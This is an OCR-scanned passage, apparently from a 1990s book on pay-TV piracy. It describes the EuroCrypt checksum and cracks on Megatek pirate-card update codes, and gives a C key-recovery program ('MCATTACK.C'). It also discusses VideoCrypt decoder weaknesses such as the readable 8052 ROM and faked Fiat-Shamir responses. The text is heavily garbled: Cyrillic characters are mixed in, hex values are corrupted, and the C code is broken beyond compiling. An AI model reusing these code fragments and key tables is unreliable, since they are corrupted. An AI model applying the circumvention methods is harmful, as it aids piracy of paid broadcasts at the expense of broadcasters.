happen or perhaps it was just that someone turned the air-conditioning off in 
one of the FilmNet or TV1000 counter-piracy offices and their brains 
overheated producing, for once, a promising idea. 


Without a knowledge of the EuroCrypt checksumming routine, the EuroC- 
гурі Phoenix experiments could not have worked. Most of the better 
commercial pirate card implementations had this checksumming routine 
incorporated. It would have been an easy ECM to include some packets 
with bad checksums. The pirate cards without this checksumming routine 
would have accepted these cards and thus the decoder would not decode 
properly. 

The checksumming in EuroCrypt is also based on the DES algorithm. It 
takes the bytes of the CA88 message and uses them as the input to the 
algorithm to produce a result that should be equal to the checksum in the 
packet. The bytes are EXORed with an eight byte buffer, eight at a time. 
Then the buffer is processed. On the last application of the algorithm, the 
remaining bytes are EXORed with the buffer and the buffer is processed 
even though there were not eight bytes remaining. The algorithm used for 
the checksumming routine is modified slightly so that the ordering of the 
results of the S Box selection is different. The results from 51,52 are 
swapped with the results from S5,S6. 


The ease with which the EuroCrypt Phoenix was constructed was due in no 
small part to the availability of information on the packet structures. It was 
possible to activate and deactivate cards. It was also possible to upgrade 
keys. 


Though the concept of a EuroCrypt Phoenix may seem strange, it should be 
remembered that there is talk of a PPV service being introduced using the 
EuroCrypt system. In the event of such a service, this kind of program 
would prove to be a major threat assuming the keys and possibly the new 
hash function are known. 
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Megatek Update Codes Hack 


The whole principle of the Megatek, Cardtronix and Benedex battery cards 
is that they allow for a secured update. To date this update channel has 
been via telephone line or via internet. The more advanced models are to 
have modem update but the whole system depends on a secure method of 
update. Otherwise everyone would be able to get the updates at the same 
time. From a commerical viewpoint, this would not be good. The update 
procedure of the Megatek card has of course been changed to a more 
secure format. 


The update of the FilmNet and TV1000 keys in the Autumn of 1995 
provided some material for a challenge. Unfortunately the two encrypted 
keys are not enough to derive a full encryption algorithm as used by the 
Dallas 5002FP for the addressing and data. But that was not the objective. 
The weakness was in the algorithm that Megatek used in the card. It was 
relatively trivial to break. (Actually | could not find a crossword puzzle) 


The updates for the Megatek cards are supplied in an alphabetic format. 
Each block is three letters wide. As a result, these three letters represent an 
octal code. 


a=0 e=4 
b=] 1-5 
с-2 6-6 
d=3 h=7 


The three letter blocks break down as follows: 
L1*(82) + L2*(81) + L3*(8°) 


To translate from the three letter blocks to hexadecimal is therefore 
straightforward. 


FilmNet 
Alpha-Octal Octal Hexadecimal 
BEG AGF ACD BCH 146 165 125 127 66 75 53 57 
BEG DAC DCH DHG 146302327376 66 C2 D7 FE 
BEG BEF DEB САА 146 145 341 200 66 65Е1 80 
BEG AGG DDB CCD 146 066 331 223 66 36 D9 93 
BEG AGD AEC BAE 146 063 042 104 66 33 22 44 
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BEG AAF DBG DDD 
BEG CBD DFG DAC 


TV1000: 


Alpha-Octal 

BEG BDD BGD CHF 

BEG BGA ABC CFB 

BEG BCD DAF DCC 

BEG BHC DGH CDH 
BEG CAH CHF CFE 

BEG DHF CAB AFC 

BEG ADH ADH DGE 


The format of the instruction appears to be WRITE ADDRESS DATA. The 
66h value is the write instruction, the following two bytes may be the 
address in encrypted format and the last byte is the key. The encrypted keys 
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146 005 316 333 
146 215 356 502 


Octal 

146 133 163 875 
146 160 012 251 
146 123 305 322 
146 172 367 237 
146 207 275 254 
146 375 201 052 
146 037 037 364 


for FilmNet and TV1000 are shown below: 


K, FilmNet: 
57 FE 80 93 44 DBC2 


K, TV1000: 
BD A9 D2 9F АС 2A F4 


Since the plaintext keys are also now available it is possible to compare 


66 05 CE DB 
66 8B EE C2 


Hexadecimal 

66 5B 73 BD 
66 70 OA A9 
66 53 C5 D2 
66 7A Е? OF 
66 87 BD AC 
66 FD 81 2A 
66 1F 1F F4 


them. A simple EXOR shows interesting characteristics. 


Kp FilmNet: 
Fe 58 27 33 EB 79 61 


К, TV1000: 
90 87 FD B? 85 00 DF 
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FilmNet K, EXOR K, 
Ke 57 FE 80 93 44 DB C2 
Kp F2 58 27 33 E5 79 61 


А5 A6 А? AO Al AR AS 


A 


TV1000 K, EXOR к, 
Ke BD A9 D2 9F AC 2A F4 
к, 90 87 FD B7 85 00 DF 


ар дЕ 2F 28 29 2A 2B 


A 


The sequence obtained when the plaintext key is EXORed with the 
ciphertext key is unusual. The high nybble is a static value but the lower 
nybble increases by one. The sequence of the low nybble seems to reset in 
byte 03. Essentially it seems 7 seems to be subtracted from the value of the 
previous low nybble to give the new starting value. The reason for this 
becomes clear when the numbers from 0 to F are listed in binary. The 
column marked with the asterisk (*) has the same characteristic. 


0 0000 9 1001 
1 0001 А 1010 
2 0010 B 1011 
3 0011 с 1100 
4 0100 D 1101 
5 0101 E 1110 
6 0110 F 1111 
7 0111 

8 1000 


At first, it looked like the static nybble could be obtained by EXORing the 
high nybbles of the first and second bytes of the encrypted keys. This 
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worked perfectly for the FilmNet pair but was not successful for the TV1000 
pair. 


FilmNet: TV1000: 
5 EXOR F = 2 B ЕХОКА-1 


One possible reason is that the values to бе EXORed аге both greater than 
9. Therefore in that case, one has to be added to the result of this EXOR. 


Outline Of Algorithm: 


1. The high nybble is always static and the low nybble is sequential. It was 
pointed out that talking of the high nybble as being static may be incorrect 
as the five of the high bits are always static. The static data may indicate 
that it is some form of counter or register that is EXORed. One candidate is 
the address register. 


(sNh)= B1(Nh) EXOR B2(Nh) (If B1(Nh) and B2(Nh) greater than A, add 1) 


2. The sequence of the low nybble is broken at byte 03. The new starting 
value created for this nybble is equal to the previous nybble value minus 
seven. 


McAttack Experimental Code 

-------- cut here -------- 

#include <stdio.h> 

#include <dos.h> 

/* MCATTACK.C 

This program crunches the encryption on the Megatek battery 
card updates and generates 256 possible DES keys for any DES 
update. The reduction from 2456 to 2^4 means that all the 
possible keys can be tested in less than a second. 

Change the values in the ekey and lkey arrays to the low 

and high nybbles of the encrypted key bytes. This is an 
experimental piece of code so it is not as elegant as it 
could be. 

Last Rev: 19951020 

FilmNet key: 

plaintext: F2 58 27 33 E5 79 61 

ciphertext: 57 FE 80 93 44 DB C2 
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TV1000 key: 
plaintext: 90 87 FD B7 85 00 DF 
ciphertext: BD A9 D2 9F AC 2A F4 
*/ 
/* 
unsigned char ekey[7]={ Oxb, Оха, Оха, 0х9, Оха, 0х2, Oxf }; 
unsigned char 1кеу[7]={ Oxd, 0x9, 0x2, Oxf, Oxc, Оха, 0x4 }; 
unsigned char ekey[7]={ 0x3, Oxc, 0х6, 0х3, 0x3, 0x0, 0х8}; 
unsigned char 1кеу[7]={ 0х5, 0x2, 0х5, 0x6, 0x3, 0х5, Oxb }; 
%/ 
unsigned char ekey[7]={ 0x5, Oxf, 0х8, 0x9, 0x4, Oxd, Oxc }; 
unsigned char 1кеу[7]={ 0х7, Охе, 0x0, 0x3, 0х4, Oxb, 0х2}; 
/* 
filmnet co12 
unsigned char ekey[7]={ 0x7, Oxc, 0x6, 0x3, 0x3, 0x0, 0x8 }; 
unsigned char 1кеу[7]={ 0х5, 0x2, 0x5, 0х6, 0x3, 0х5, Oxb Ы 
unsigned char ekey[7]={ 0x5, 0x7, 0x5, 0x7, 0x8, Oxf, 0х1}; 
unsigned char 1кеу[7]={ Oxb, 0x0, 0x3, Оха, 0х7, Оха, Oxf }; 
*/ 
unsigned char l,b,c,e,h,ok,q,r,s,t,u, v,w,X,y,Z; 
/* The global array fill option is used to fill the arrays */ 
unsigned char dkey[7]={0}; 
unsigned char Harray[16] [7]={0}; 
unsigned char Larray[16] [7]-(0) ; 
unsigned char Parr0[16] [7]={0}; 
unsigned char Parr1[16] [7]={0}; 
void main(void) 
( /* This is the timing routine that was irrelevant 

struct time t; 
gettime(&t) ; 
printf("The start time is: %2d:%02d:%02d.%02d\n”", 
t.ti hour, t.ti min, t.ti sec, t.ti hund); 

*/ 
/* Fill High Array */ 

for (c=0; с<-ОхҒ; c++) 

{ for (e=0; e<=6; e++) 
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{ ok=0; 
оК-с A ekey[e] ; ` 
оК=оК<4; 
Harray[c] [e]=ok; 
m 

m 


/* This section here could be done using a for loop but since 
checking the result at each stage was important I used a */ Š 
more basic approach. */ 


for (c=0; c<=0xf; c++){ 
х=с; 
l=xAlkey[0]; Larray[c] [0]=1; 
x=x+1; if (x>Oxf) x=x-Oxf; 
1-хА1Кеу(11; Larray[c][1]=1; 
х=х+1; if (х>0хҒ) x=x-Oxf; 
1-хА1Кеу(21; Larray[c] [2]=1; 
x&-0x0f ; if (x»0xf) x=x+0xf; 
12x^lkey [3] ; Larray(c] [31-1 ; 
х=х+1; if (x>0xf) x=x-Oxf; 
1-хА1Кеу(41; Larray[c][4]-1; - 
х=х+1; if (х>0хҒ) x=x-Oxf; 
1- xAlkey[5]; Larray(c] [5]=1; 
x=x+1; if (x>Oxf) x=x-Oxf; 
1- x^lkey [6] ; Larray[c] [6]-1; 
һ 


Х=Х-7; 


{ printf (“High Array Low Аггау\п”) ; 
for (x=0; x<=Oxf; x++){printf(“\n”); 


for (у=0; y<7; у++) {printf (“%Х”, 
Наггау[х] [y]>4) 3}; 


printf(" "); 
for (2-0; z«7; z++) {printf ("XX ", Larray[x][z]);}; 
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һ 


for (x=0; x<=Oxf; x++){ 
for (y=0; y<7; y++){ 


ParrO[x] [у]=Наггау [х] [y] | 
Larray[5] [y]; 


P. 1 =H 
Larray[0xd] [y]; агг1[х] [y] -Harray[x] [y] | 


һ 
} 


pri ntf CSR RARER RRR RR HERR ER ERE ыы АТЫ) ; 


printf(" (0x5 Group) Possible Key Arrays (Оха Group)" ; 
printf(“\n---------------------------------------- Ха”); 
printf(" Encrypted Key: "); 

for (х=0;х<7; х++) (dkey [x] 2 Cekey [x] «4) | lkey [x] ; 
printf("X2.2X", dkey[x]);}; 


h=((ekey [0] «4) ^ Cekey [1] <4))>4; 
ifCekey[0]»ekey[1]) h=h+1; 


printf(“\n Potential keys on row X2.2x ", h); 
pri ntf ("NnseieieieeedetedekeedekedeiedeedeeedekedeieededeiedeieiedeieeieeieR 1") - 


/* for (x=0; x<=Oxf; x++){ printf("X2.2x | ", х); */ 
x-h;i 
for (y=0; y«7; y++){ 
printf("X2.2X ",ParrO[x] [y]); 
қ 
printf(" 9); 
for (2-0; 2<7; z++){ 
printf("X2.2X", Parr1[x][z]); 
Н 
printf(“\n"); 
m 
3; /*Now Wasn't That Fun :-)*/ 
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The C source code given here is the experimental code that was used to test 
the ideas. | had included a timing loop to read the start and end times of the 
program execution. At first | thought there was an error in that element of 
code. The program was executing and the clock was not being updated. It 
turned out that the time taken to calculate the keys, even with the full key 
table values was too fast for the PC to read. Megatek changed their key 
update method. The Cardtronics update method is also different. 


It was sheer chance that this weakness was stumbled upon. But one thing is 
apparent here - it is very important for a cryptanalyst or hacker to be lucky. 
Of course a modicum of insanity also helps. The Dallas 5002FP is one of the 
most difficult chips in the world to hack. It was for this reason that Megatek 
used it. But in the midst of all this security, there was one small oversight 
that allowed the key update to be hacked. | guess they thought nobody 
would be crazy enough to try. 


The update procedure on other battery cards seems to be more secure than 
this one. According to one source, the IDEA algorithm was used to encrypt 
the update codes for one of the cards. 


The interesting thing here is that the battery card update procedure was 
cracked using a known plaintext attack. This was really only possible on 
D2-MAC EuroCrypt keys. This is because the keys were used in their raw 
format in the Megatek card. Thus there was no second level of encryption 
beneath the update encryption. Had there been a second level of encryption, 
this simple attack would not have worked. 


Naturally with all the ECM codes for the Sky 09 available, this looked like a 
promising approach for trying to attack the address and data encryption on 
the Dallas 5002FP itself. The objective of this hack was only to crack the 
update keys. The elements that led to the hack were the regularity of the 
update code format, the simplicity of the encryption algorithm and the 
availability of some plaintext. It is not likely that this combination will be 
repeated. 
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The title of the chapter is “Video Manipulative Systems". A VMS is a system 
that digitises and scrambles the video. The key word is digitise. A digital 
system theoretically offers more security but in practice the system can be 
hacked because of flaws in the other areas of the system. The old argument 
that digital systems will spell the end of piracy is not valid. Indeed all of 
hacks covered here deal with systems that were, at one time, supposed to 
be pirateproof or hackerproof. They were not. No system protecting 
valuable programming is ever secure for long. 


Many of the systems covered in this chapter are perhaps best described as 
transitional systems. While they are firmly based on analogue television 
standards, they use digital encryption methods to achieve their security. 
Most of the encryption is aimed at protecting the datastream that allows the 
video to be decoded by an authorised card or decoder. 


While the access control area of these transitional systems are strictly 
digital and use hard encryption, the video is still only scrambled, albeit by 
digital techniques. 


The differentiation here between words “encryption” and “scrambling” is 
subtle. The video scrambling is not strictly encryption as such. It does not 
alter the value of the video. It merely transposes the video in the time 
domain. The simplest way of thinking of this kind of scrambling, whether cut 
and rotate or line shuffle, is as a transposition cipher than just alters the 
position of the letters in a message. This transposition cipher does not alter 
the actual letters. 


Of course considering the Video Manipulative Scrambling system as a 
transposition cipher is a drastic simplification. It takes a lot of electronics to 
produce this transposition. This is also the reason that these systems are a 
lot more difficult to hack than systems that are primarily based on 
manipulating the synch pulses. 


The Multiplexed Analogue Component, MAC, system with its many variants 
is somewhere in the wilderness between the transitional systems and the 
real digital television systems. It too uses digital scrambling techniques to 
alter the position of the video. It also compresses the video packets and 
uses digital audio. However it too is primarily a glorified scrambling system 
as opposed to a fully fledged digital system. 


The one exception to the systems above is the DirecTv system. This 
system is effectively a digital television system. It uses MPEG 1.5 and digital 
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techniques to encrypt the data and transmit that data. It was effectively the 
first real digital television system to be hacked. 


The DirecTv system was hacked because some people, who should have 
known better, fell for the same line of disinformation that had worked so well 
for News Datacom here in Europe. They actually were convinced that the 
DirecTv system was unhackable - right up until the first pirate cards 
appeared. Even then they did not seem to believe it. 


The hypothesis of considering a hack as a virus or a disease, as outlined in 
Chapter 1, has a particular relevance here when discussing the DirecTv 
system. The official smart card used for the 09 Sky card, the VideoCrypt-2 
card and the DirecTv card is the same. Only the program in the EEPROM 
seems to be different. Therefore since the hackers were familiar with 
hacking the 09, the same information was applied in hacking each of the 
subsequent systems. Economy of scale also works against a system 
manufacturer, or as an old pirate expression would put it: “swing one, swing 
all say 1.” 


It is such an event where a common element is hacked that demonstrates 
just how stupid the arguments for a single scrambling system or standard 
and how ignorant the proponents of such a system or standard are of 
piracy. 


Most of the systems in use here are at least five years old and as such they 
now seem to be from a different era when some people still believed in such 
things as unhackable smart cards. Today, only fools believe that a system is 
unhackable. 


The systems on the market in Europe have been hacked. The majority of 
the hacks have been on the access control section of the systems. However 
the hack on the Nagra system was based on attacking the video 
scrambling. The problem with the Nagra system for hackers was that there 
were not enough decoders in free circulation to make a pirate smart card a 
valid business proposition so the only viable alternative was to make a 
pirate decoder that hacked the system from the video scrambling aspect. 
This alternative hack was not possible, technically and economically until 
the last year or so. 


With the other systems, the hackers refused to attack what arguably was 
the strongest point of each system. It was almost as if the thought mode of 
the system designers was frozen in the attrittion warfare style of World War 
One. The hackers meanwhile use a more fluid approach more akin to 21st 
century guerrilla warfare. 
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The main element in the rise of video manipulative systems has been the 
low cost of video Analogue to Digital Converters, ADCs, and video Digital to 
Analogue Converters, DACs. This has of course created problems for some 
of the older VMS such as B-MAC. It has become possible for a hacker to 
build an economically feasible pirate video only decoder. The weakness that 
allowed the hack to succeed was the actual standard transitions in the 
waveform. 


The whole idea of an access control system based only on smart cards is 
now seen in a very jaundiced light. The attitude that smart cards are the 
panacea for piracy evapourated with the hacks on the VideoCrypt, 
EuroCrypt and DirecTv smart card systems. 


When the hacks occur, the companies providing the access control act with 
alarming detachment or they do lunch meetings. Most of them are perhaps 
used to dealing with bankers. In banking, the admission that a system is 
hacked is tantamount to suicide. This attitude apparently infected these 
access control companies. The result on the channels using these systems 
was devastating and in some cases legal action against these companies 
for incompetence is probably justified. 


The main problem appeared to be that the access control system provider 
had a “Screw You” agreement with the channels. It was irrelevant whether 
the system security remained intact, they got their money either way. Of 
course if the recent court action in the UK High Court is anything to go by, 
News Datacom were also being screwed by their own people, allegedly. 
Apparently they are taking an action against 11 defendants associated with 
News Datacom for allegedly conspiring to artificially inflate the price of 
smart cards that News Datacom had to pay. The action is for some £19 
Million pounds in damages. Hackers and pirates all over the planet fell 
around laughing when they heard about this. The irony of this was that 
News Datacom chasing after pirates while they allegedly had such a 
massive problem like this on the inside. 


DirecTv in the USA has also been hit by piracy. This is not surprising 
considering that their card was a development of the VideoCrypt card used 
here in Europe. However the path of the hacks in DirecTv is slightly different 
to those of the hacks on VideoCrypt. 


During the launch of the DirecTv system in 1994, an article in an edition of 
the American publication, “Satellite Retailer’ brought to mind Hemming- 
way’s quotation about the most essential piece of equipment for a journalist. 
The article claimed that there had been “no reports of a pirated VideoCrypt 
since its entrance into the market in 1989”. Yeah right! Now this statement 
was made roughly one year after the Ho Lee Fook hack on VideoCrypt had 
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started operating and at the height of the piracy on Sky's 07 card. To a 
European, this statement was tantamount to a lie. VideoCrypt had been 
utterly and totally hacked for a year in Europe. This major fact had been 
neatly ignored. The sole aim of the article was to make the DirecTv system 
and News Datacom look good. 


The article was typical of the ignorant and inane claims made in Europe by 
News Datacom's marketing brochures. It looked like they were trying to pull 
the same "minimal information" operation on the press in the USA. When 
VideoCrypt was launched in Europe the praise in the satellite press was 
worse than a Mexico city wind storm. 


Recent events in North America have shown that News Datacom and their 
client DirecTv seem to be adopting the same tack. The announced that they 
have filed a civil suit against 22 named defendants whom allegedly engaged 
in all sorts of terrible plots to hack and pirate the very secure DirecTv 
VideoGuard system. 


If it was so secure, as the gullible individuals in DirecTv stated, then why 
was it hacked? The quotes surrounding the launch made it look like the 
hack could never have happened. | guess you could call it the "Security By 
Publicity" strategy. 


Two facts have emerged from this mess. The first fact is that a renewable 
security element does not confer some sort of immunity to hacking upon the 
system. The second fact is that some people will believe absolutely 
anything. 


The raids on battery card users and dealers in the USA and Canada have, 
far from curing the piracy problem, drawn the next generations of hacks on 
smart card based systems closer. These hacks will be modified SEASON 
type hacks with security elements to prevent the end user from redistribut- 
ing them. They will be delivered via internet and BBSes from outside the 
jurisdiction. 

The pirate Sky 10 Battery Cards have actually gone through their first 
ECMs. The ECM was effective on all Battery Cards. However the hackers 
and pirates had a solution. It does involve sending the card back to the 
manufacturer. This could indicate that the pirate DSS card option may be 
the way things will go with pirate cards in the future. Alternatively, the 
FireLyte™ method of updating the cards could be used. 
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System: VideoCrypt-1 


The VideoCrypt system was a good low cost attempt at a secure scrambling 
system. It was based on the premise that the smart card provided hackers 
with a moving target rather than a sitting one. When the smart card was 
hacked, the theory was that it could be replaced. 


This theory did not work very well. By April 1993 the smart card for the Sky 
channels was totally compromised. It was not until Dark Wednesday, May 
18th 1994, that the Sky smart card had been properly replaced. 


By June of 1994, a hacker version of the 09 Sky code was on auction. It was 
October 1994 before the first stable 09 pirate cards entered the market. 
From then on it was a downward spiral for the 09 card. The hackers and 
pirates had until 31st October 1995 before Sky changed to their new card, 
the 10. 


The 10 card was hacked as well. The first indications of this occurred on the 
Friday before Easter Sunday 1996. This is referred to as “Good Friday” in 
Ireland. For the pirates and hackers it certainly was. It marked the triumph 
of pirate technology over that of Sky. It was also fulfilling a pattern 
established over the last few years. 


The pattern is the hack pattern for the Sky smart card. The pattern is that a 
stable pirate card generally appears six months or so after the introduction 
of the new official card and the pirates generally have some 11 months of 
money making activities from each hack. 


It was readily apparent from the start of the Ho Lee Fook hack that the 
VideoCrypt smart card system had been totally compromised, News 
Datacom and Sky acted strangely. Their claims of a replacable smart card 
became just so much hot air. They lumbered from one crisis to another. 
Their electronic countermeasures were defeated with startling rapidity. It 
was apparent to everyone in the Blackbox industry that their system was 
totally hacked. Yet they persisted in their ivory tower views and tried to 
pursue pirates through the courts. 


The legal action was the last straw - these people were not playing with a 
full deck. They could not protect their own system using technological 
means so they tried to use lawyers to fix it. It was like using a band-aid to fix 
a decapitation but with far messier effects. However the impending 
legislation in Europe may change things slightly. 
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The cover page of the VideoCrypt European Patent Application 
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At this point in time VideoCrypt looks very old. But then it was developed in 
the mid eighties. For that time period it was an elegant compromise in terms 
of engineering. 


When the system was launched, some of the public relations people 
claimed that it was the most pirateproof system yet devised. This 
pirateproof attribute was a myth. A myth is an attempt to explain a reality 
with the mental tools available. Therefore since the public relations people 
neither understood the abilities of hackers or the security of the system it 
would be, to them at least, pirateproof. 


The philosophy of the VideoCrypt system is that of the Detachable Secure 
Processor. The decoder itself is merely a dumb terminal. The detachable 
secure processor is the smart card. Theoretically the smart card contains 
the critical data and the decoder contains nothing of significance. This 
“dumb terminal” idea has been echoed by and about News Datacom and 
Sky executives. 


The decoder only contains the masked ROM 6805 and the masked ROM 
8052. Both of these chips have been popped. Indeed the 8052 was 
unprotected. The 6805 contains most of the off-air data processing routines 
where as the 8052 is the housekeeper. 


A great and respected mathematician, Professor Adi Shamir, was intro- 
duced as the creator of the algorithms used in the system. The News 
Datacom promotional material contained great claims of how the smart 
cards had to authenticate themselves every few seconds. As this authenti- 
cation procedure was unbeatable, there was no way that a pirate smart card 
could be used with this system. 


The Fiat-Shamir Zero Knowledge Test is the actual authentication proce- 
dure and it is indeed extremely difficult if not practically impossible to defeat 
when used properly. Right, | know what you are thinking - if the 
authentication procedure was so good then why was the system hacked 
with pirate smart cards? The answer to that will become glaringly apparent. 


Apart from the obvious sources of information, there is another one. One 
that went by largely unnoticed. In 1990, News Datacom filed a patent 
application for a European patent on the VideoCrypt system. It did not 
specifically refer to VideoCrypt and as a result it went largely unnoticed. 
Instead most hackers went after the Thomson patents. 


The application was filed by News Data Security Products Limited of Hong 
Kong. The inventors were Michael Cohen and Jonathan Hashkes of Israel. 


7: Video Manipulative Systems 


A few years ago, Interspace published a rather irate letter from Jonathan 
Hashkes of News Datacom. In the letter he criticised all hacks on the 
system as being "'Shillelagh Hacks". At the time | was not sure whether this 
was a personal insult or a demonstration of ignorance. In a reply, | pointed 
out that a Shillelagh was a large stick for performing brain surgery without 
an anesthetic and the hacks on VideoCrypt would have a similar effect. 
Little more was heard of Mr Hashkes until the discovery of the patent 
application. 


When | read the patent application, | could not help noticing that it cited the 
Baylin Publications book, “Satellite and Cable TV Scrambling and Descram- 
bling” by Frank Baylin and Brent Gale. It was a particularly bad book on 
which to base judgments about the security of any scrambling system. Of 
course if they believed that that book was written by hackers then it is easy 
to see why VideoCrypt was hacked. 


The summary of the invention, it was claimed that the invention, VideoCrypt, 
would provide improved apparatus and techniques for controlling access to 
broadcast transmissions. It would also include a public key proof, preferably 
a Fiat-Shamir public key proof, that would authenticate the smart card to the 
decoder. 


The patent application gave very comprehensive information on the system 
architecture. Indeed it was startling to see how little the system had 
changed in implementation. It confirmed many of the theoretical outlines 
that had been built up from various sources over the last few years. There 
were even examples, in object code, of some of the programs used in the 
system. 


The information in the patent application, while being old, does give an 
insight to the access control architecture in the VideoCrypt system. What 
emerges is more of a low budget system than contemporary systems such 
as EuroCrypt. More importantly for the era, the emphasis was on a cheap 
affordable solution rather than the all encompassing system. 


The decoder is effectively a terminal and does not contain any keys. There 
is even talk of a mail box option for sending messages to individual users. In 
this respect it is similar to the old BSB EuroCypher system which had a 
rather elegant messaging system. 


If anything, the VideoCrypt system drew heavily on previous systems though 
the use of the Fiat Shamir ZKT was new. Above all it seemed to be an 
attempt to get something in place that was effective, cheap and quick to 
assemble. 


7: Video Manipulative Systems 


The VideoCrypt Subscriber Management System 


The information on the VideoCrypt Subscriber Management System was 
largely gathered from the patent. Indeed it would seem that the main part of 
the structure of the SMS has not changed. The addressing is still carried out 
via the 32 byte 74h packets. 


From the pictures in the News Datacom brochures, a large number of 
terminals are linked to the customer service computer. This would tend to 
indicate that it is perhaps a large network based on a mainframe. The actual 
brand of computer used as the service computer is not known but it given 
that most of the architecture is IBM, an IBM mainframe would not be 
unthinkable. In the early days Amstrad 1640s or Amstrad 1512s were in use 
as terminals though this seems to have changed judging from the pictures. 


The subscription management system is, apparently, based in Livingstone 
in Scotland. They prepare a set of magnetic tape cartridges with customer 
details, such as subscriber numbers and channels purchased, which are 
then sent to News Datacom's premises in Maidenhead in England. The 
subscriber smart cards are personalised at the Maidenhead premises and 
are then shipped to the subscribers. 


In the patent, the architecture of the subscriber management is based on 
individual computers. It would be more accurate to classify these elements 
in the structure as computer programs rather than distinct computers. They 
would of course be networked. Each channel would require its own 
separate master card or else the key could be generated from the 8052 
verifier. 


The generation of the key from the 8052 verifier would be the most logical 
method of generating the key for the free access mode. A large table of 256 
bytes is present in each 8052. This could be used as the data for the public 
modulus for the Fiat Shamir ZKT, but it could also be used as the code table 
for the decryption key generation. 


The Security Computer: 


According to the patent, this would be an IBM AT computer with multiple 
serial ports. The most likely configuration, today, would be a 486 or better 
with a multiple serial port card. 


The function of the security computer is to act as a hub for the other 
computers in the network. It has to combine information from the Security 
Database Computer, the Subscriber Management System and the master 
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The subscriber management system is based in Livingstone in 
Scotland but the main studio facility is near London. This would imply 
that there is a leased line system (perhaps ISDN) between the points. 


A master smart card is used to generate the seeds for scrambling 
though the verifier chip (8052) can also be used. This would probably 
account for the spurious reports of decoders decoding pay channels 
without cards. 
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smart card. The information from the Security Computer is passed to the 
broadcast VideoCrypt encoder. 


In the patent, the implementation for one channel was shown. With the 
number of channels operating at the moment, a separate Security Compu- 
ter would be required for each channel. 


The Subscriber Management System: 


This computer system is linked to the customer service computer and 
generates the list of cards to be turned off and the list to be turned on. 


The patent mentions that the subscriber management computer system 
could be based on a mainframe. The logical option here would be an IBM 
mainframe as the rest of the system appears to be IBM flavoured. 


The Security Database Computer: 


The Security Database Computer supplies the Security Computer with the 
operational information on the programmes and pay per view. The 
operational information deals with items such as the identification, rating 
and duration and grouping of the programme being broadcast. 


Video Scrambling 


The scrambling technique used in VideoCrypt is line cut and rotate. The 
video is digitised and then cut at one of 256 possible points. The digitised 
video segments are then rotated about this point and the digital video is 
converted back to analogue. 


The fact that the cut point is one of 256 points means that it can be defined 
as an eight bit word. This byte is supplied by a Pseudo Random Number 
Generator. The PRNG is sixty stages long and is reset approximately every 
two and a half seconds. 


VideoCrypt transmits addressing and access control data in a few lines of 
the VBI. The data rate is slower than that of teletext. Each of the packets of 
data has a checksum. This checksum is a product of the active data in the 
packets. 


Only 585 lines or so in each frame are scrambled. This is to enable the VBI 
signals to be checked without descrambling the video. The reason for this is 
so that the signal quality can be checked on SMATV and cablenets without 
having to descramble the signal. It is a standard feature on most scrambling 
systems. 
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Decoder Architecture 


The VideoCrypt stand alone decoder is a hybrid design. It uses both 
discrete components and surface mount components. This is necessary to 
reduce the size of the board. The board type used in the early stand alone 
decoders is SRBP or synthetic resin bonded paper. It is not the most 
reliable of board materials but it is one of the cheapest. It does reflect the 
television manufacturing industry as most of the boards in television 
receivers are SRBP. 


In the IRD version, the power supply is part of the main receiver PSU. There 
are four voltage rails in the decoder: +21V, +12V5, +15V and +5V. The main 
part of the circuitry runs off of the +5V0 rail. 


There are an estimated ten different VideoCrypt IRD designs on the market. 
Though the operation in each case is largely the same, they have been 
tweaked for operation with a particular receiver design. 


The circuit diagram for the VideoCrypt decoders are issued to authorised 
service centres on supposedly photocopy proof paper. This of course is a 
quaint if stupid move. Most television engineers have been able to obtain a 
circuit diagram as they have been on the market for the last few years. 


The House Keeper Microcontroller: 


The main processor in the descrambler is the 8052 from Intel. This is a 
microcontroller and has an on-chip ROM and RAM. There are also two 
types of this microcontroller available; the BASIC ROM version and the 
Mask programmable version. The version used in the descrambler is the 
Mask version. This means that there is an 8K program running the decoder. 
The 8052 can be forced to disgorge the control program. 


Many veteran hackers who examined the Sky decoder were suspicious of 
the ease with which the 8052 could be forced to disgorge the control 
program. 


There are a few theories as to why the ROM in this chip was not protected. 
The most obvious one had to do with the rate at which the chip failed. As 
this chip handled the card interface, it would be the one that the hackers 
would start to play with. As a result it would be the one most frequently 
destroyed "accidentally". Rather than have a service centre stocked with 
replacement 8052s, an EPROM version could be blown and inserted in 
place of the original. 


The other theory is based on stupidity. If you have designed an invincible 
system, protecting the ROM would be just icing on the cake. VideoCrypt 
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was far from invincible. The КОМ in the VideoCrypt Il decoder is protected 
but that was to little avail. It was quickly popped and examined. 


Of course the fact that the program in the 8052 could be read and examined 
meant that the whole card to secure processor interface could be monitored 
and where necessary the data could be modified. This fact led to the one of 
the most devastating hacks on VideoCrypt - The KENtucky Fried Chip. 


The information in the VideoCrypt patent application was largely duplicated 
in the VideoCrypt | 8052 right down to that 256 byte data table. There are 
minor differences between the implementations but they are, apparently, 
largely the same. 


Other aspects of the system became clear. The decoder could use both 
smart cards and memory cards. When the decoder was using memory 
cards, it would use an internal algorithm to generate the seed. This meant 
that a decryption algorithm had to be present in the actual decoder. 


There is an element of the 8052 that is not in current use on the Sky 
channels. The Fiat Shamir Zero Knowledge Test is an integral part of the 
security of VideoCrypt. It is the one thing that, the brochures claimed, would 
stop the pirate clone cards. 


In fact if the Fiat Shamir Zero Knowledge Test had been in operation then 
the 07 piracy could not have taken place. All the pirate cards contained was 
the algorithm and code table to descramble the video. 


The Adult Channel is currently using a very old version of the VideoCrypt 
system and it periodically triggers the Fiat Shamir Zero Knowledge Test but 
strangely the pirate card passes the test. This does tend to point to 
something being very wrong here. 


Shortly after the smart card is reset, it sends its identity number to the 
decoder. All of the pirate smart cards that | tested returned a string of 
zeroes. Their identity number was 00 00 00 00 00 00. The decoder did not 
reject this identity number and indeed | do not think that any VideoCrypt 
decoder rejected it. The most obvious hack trap was ignored. The decoder 
did not even check to see if the decoder number was false. Of course the 
hackers would try to play false identity numbers but at the very least the 
decoder should have rejected such an obvious fake identity number. 


The Fiat Shamir packets transmitted by the smart card on the Adult channel 
are each 64 bytes of zeroes. Since one of the numbers being used in the 
process is zero then it would seem that the response is indeed correct 
however to allow such an obvious fake response. 
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The Fiat Shamir Zero Knowledge Test is actually a very difficult thing to 
fake. Indeed properly implemented, it would have made VideoCrypt a very 
difficult system to hack. The fact that the decoder has to contain the 
routines to execute the test points to where the problem lies. 


What happens if the hacker can watch the whole protocol taking place and 
can actually emulate the protocols? The 8052 was unprotected. Its program 
was dumped and In Circuit Emulators, (ICE), were used to experiment with 
the program in operation in real time. 


The routines dealing with the Fiat Shamir ZKT could quickly be established. 
